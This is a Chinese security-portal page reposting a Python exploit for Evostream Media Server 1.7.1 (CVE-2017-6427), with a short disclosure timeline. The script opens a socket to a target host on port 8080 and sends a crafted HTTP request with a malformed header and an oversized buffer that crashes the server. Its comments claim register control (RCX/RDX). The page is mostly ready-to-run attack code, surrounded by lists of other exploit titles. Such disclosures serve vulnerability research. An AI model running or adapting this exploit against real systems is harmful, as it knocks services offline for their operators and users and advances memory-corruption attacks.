首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Evostream Media Server 1.7.1 (x64) - Denial of Service
来源:http://www.saptech-erp.com.au 作者:Baris 发布时间:2017-03-08  
# Exploit Title: Evostream Media Server 1.7.1 – Built-in Webserver DoS
# Date: 2017-03-07
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: https://evostream.com/software-downloads/
# Version: 1.7.1
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6427
 
# 2017-03-02: Vulnerability reported
# 2017-03-03: Software vendor answered, vulnerability details shared
# 2017-03-07: No answer, publishing
 
import socket
import sys
 
try:
    host = sys.argv[1]
    port = 8080
except IndexError:
    print "[+] Usage %s <host>  " % sys.argv[0]
    sys.exit()
 
 
 
buffer = "GET /index.html HTTP/1.1\r\n"
buffer+= "Host: "+host+":"+str(port)+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: http://192.168.198.129/login"
buffer+="Connection: keep-alive\r\n"
buffer+="Cont"+"\x41"*8+":\r\napplication/x-www-form-urlencoded\r\n"   # RCX Control
#buffer+="\xff\xad\xde"+"\x41"*8+":\r\napplication/x-www-form-urlencoded\r\n" # Remove hash to control RDX and CX(it will have the value 0x000000000000dead)
buffer+="Content-Length: 5900\r\n\r\n"
buffer+="B"*4096 # This is just to prove that the stack will also contain any buffer delivered with the malicios HTTP header
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Azure Data Expert Ultimate 2.2
·USBPcap - Privilege Escalation
·Struts2 S2-045 Remote Command
·Drupal 7.x Module Services - R
·Alienvault OSSIM / USM 5.3.0 A
·Livebox 3 Sagemcom SG30_sip-fr
·OpenElec 6.0.3 / 7.0.1 Code Ex
·Apache Struts 2.3.5 < 2.3.31 /
·Deluge Web UI 1.3.13 - Cross-S
·ASUSWRT RT-AC53 (3.0.0.4.380.6
·WordPress Multiple Plugins - A
·FTP Voyager Scheduler 16.2.0 -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved